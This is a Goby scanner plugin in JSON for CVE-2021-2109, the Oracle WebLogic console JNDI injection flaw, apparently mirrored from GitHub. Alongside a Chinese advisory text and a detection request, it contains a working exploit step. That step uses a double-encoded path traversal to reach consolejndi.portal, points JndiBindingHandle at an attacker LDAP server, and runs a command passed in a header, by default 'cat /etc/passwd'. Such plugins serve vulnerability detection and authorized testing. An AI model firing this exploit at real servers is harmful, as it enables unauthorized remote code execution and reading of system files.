mirror of https://github.com/qwqdanchun/Goby.git
{
"Name": "Weblogic_LDAP RCE_CVE-2021-2109",
"Level": "3",
"Tags": [
"RCE"
],
"GobyQuery": "app=\"Oracle-WeblogicPortal\"",
"Description": "2021年1月20日,绿盟科技监测发现Oracle官方发布了2021年1月关键补丁更新公告CPU(Critical Patch Update),共修复了329个不同程度的漏洞,其中包括7个影响WebLogic的严重漏洞(CVE-2021-1994、CVE-2021-2047、CVE-2021-2064、CVE-2021-2108、CVE-2021-2075、CVE-2019-17195、CVE-2020-14756),未经身份验证的攻击者可通过此次的漏洞实现远程代码执行。CVSS评分均为9.8,利用复杂度低。建议用户尽快采取措施,对上述漏洞进行防护。本插件检测的CVE-2021-2109(WebLogic控制台JNDI注入)同样在该补丁更新中修复,应安装该CPU补丁并限制对/console的外部访问。\n\n受影响版本:\nWebLogic Server 10.3.6.0.0\nWebLogic Server 12.1.3.0.0\nWebLogic Server 12.2.1.3.0\nWebLogic Server 12.2.1.4.0\nWebLogic Server 14.1.1.0.0",
"Product": "WebLogic",
"Homepage": "https://www.oracle.com/middleware/technologies/weblogic.html",
"Author": "PeiQi",
"Impact": "<p><span style=\"color: rgb(65, 140, 175);\">咩咩咩🐑</span></p>",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech"
],
"HasExp": true,
"ExpParams": [
{
"name": "Cmd",
"type": "input",
"value": "cat /etc/passwd",
"show": ""
},
{
"name": "Ldap",
"type": "input",
"value": "ldap://xxx.xxx.xxx;xxx:1389",
"show": ""
}
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/console/css/%252e%252e%252f/consolejndi.portal?",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "JNDI",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/console/css/%252e%252e%252f/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{{{Ldap}}}/Basic/WeblogicEcho;AdminServer%22)",
"follow_redirect": true,
"header": {
"cmd": "{{{Cmd}}}"
},
"data_type": "text",
"data": ""
},
"SetVariable": [
"output|lastbody"
]
}
],
"PostTime": "2021-01-22 13:55:45",
"GobyVersion": "1.8.230"
} |